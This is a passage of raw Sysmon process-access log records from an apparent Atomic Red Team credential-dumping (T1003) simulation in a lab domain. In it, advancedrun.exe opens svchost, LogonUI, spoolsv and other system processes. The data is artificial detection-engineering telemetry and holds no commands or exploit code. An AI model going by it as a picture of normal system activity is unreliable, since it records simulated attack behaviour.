un\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003951985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003951983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003951981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003951980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003951979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 